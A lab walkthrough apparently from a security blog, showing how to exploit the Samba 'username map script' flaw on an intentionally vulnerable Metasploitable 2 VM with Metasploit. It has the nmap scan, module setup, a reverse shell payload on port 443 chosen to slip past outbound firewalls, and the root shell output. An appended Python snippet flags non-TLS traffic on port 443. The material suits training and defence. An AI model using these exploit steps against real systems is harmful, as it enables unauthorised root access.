The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMware, VirtualBox, and other common virtualization platforms.
We have installed 'Metasploitable 2' and Kali Linux as virtual machines in KVM on CentOS 7. For instructions on how to install the Metasploitable 2 virtual machine in KVM, refer to this post.
In a previous post, we carried out a vulnerability scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali Linux.
In this post, we will exploit the Samba server on Metasploitable 2 using Metasploit in Kali Linux.
We have the following scenario:
Metasploitable2 IP Address: 192.168.122.73
Kali Linux IP Address: 192.168.122.115
Perform the following steps on the Kali Linux machine:
1) We perform a port scan on the Metasploitable machine and see that the Samba ports (139 and 445) are open.
root@kali:~# nmap 192.168.122.73
Nmap scan report for 192.168.122.73
Host is up (0.00080s latency).
Not shown: 977 closed ports
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   open   ssh
23/tcp   open   telnet
25/tcp   open   smtp
53/tcp   open   domain
80/tcp   open   http
111/tcp  open   rpcbind
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
2) Start Metasploit, search for Samba modules and select the usermap_script exploit.
root@kali:~# msfconsole
msf > search samba
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
msf exploit(usermap_script) > set RHOST 192.168.122.73
RHOST => 192.168.122.73
msf exploit(usermap_script) > show payloads
We will select a payload in which the remote host connects back to our (attacker) system.
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.122.73   yes       The target address
   RPORT  139              yes       The target port
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.122.115  yes       The listen address
   LPORT  4444             yes       The listen port
Many corporate environments restrict outbound ports using a firewall, so we will use port 443, which is normally used for HTTPS (SSL/TLS) traffic and is generally allowed outbound.
msf exploit(usermap_script) > set LPORT 443
LPORT => 443
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ol88NmbSO30AG07L;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ol88NmbSO30AG07L\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.122.115:443 -> 192.168.122.73:46632) at 2015-06-13 14:35:45 +0530
whoami
root
We now have root access on the target machine.
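The session above runs a plaintext command shell over port 443, which gives defenders something to check at the egress point: real HTTPS always begins with the connecting host sending a TLS ClientHello. The following is an added example, not part of the original post or of Metasploit; the function names, the direction labels and the sample flows are assumptions constructed for illustration.

```python
import struct

TLS_HANDSHAKE = 0x16   # TLS record content type "handshake"
CLIENT_HELLO = 0x01    # handshake message type "ClientHello"
MAX_PLAINTEXT = 2**14  # largest length a plaintext TLS record may declare


def looks_like_client_hello(data: bytes) -> bool:
    """True if data begins with a TLS record header carrying a ClientHello."""
    if len(data) < 6:
        return False
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    return (ctype == TLS_HANDSHAKE and major == 3 and minor <= 4
            and 0 < length <= MAX_PLAINTEXT and data[5] == CLIENT_HELLO)


def classify_flow(segments):
    """Classify one TCP flow to port 443.

    segments: ordered (direction, payload) pairs; "c2s" is the host that
    opened the connection, "s2c" is the listener on port 443.
    """
    client = b""
    for direction, payload in segments:
        if not payload:
            continue
        if direction == "s2c" and not client:
            # In TLS the connecting side always sends first (ClientHello).
            return "suspicious: listener spoke first"
        if direction == "c2s":
            client += payload
            if len(client) >= 6:  # record header (5 bytes) + handshake type
                if looks_like_client_hello(client):
                    return "ok: TLS ClientHello"
                return "suspicious: first client bytes are not TLS"
    return "unknown: too little data"


# Constructed sample flows (not captured traffic). The first mirrors the
# handler log in this post: the listener writes an echo command, the
# connecting host answers with the token.
SHELL_FLOW = [("s2c", b"echo ol88NmbSO30AG07L;\n"),
              ("c2s", b"ol88NmbSO30AG07L\r\n")]
TLS_FLOW = [("c2s", b"\x16\x03"),  # header split across two segments
            ("c2s", b"\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + bytes(32))]

if __name__ == "__main__":
    for name, flow in (("shell", SHELL_FLOW), ("tls", TLS_FLOW)):
        print(name, "->", classify_flow(flow))
```

In practice the segments would come from a packet capture or a flow sensor on the firewall; the check looks only at the first bytes of each connection.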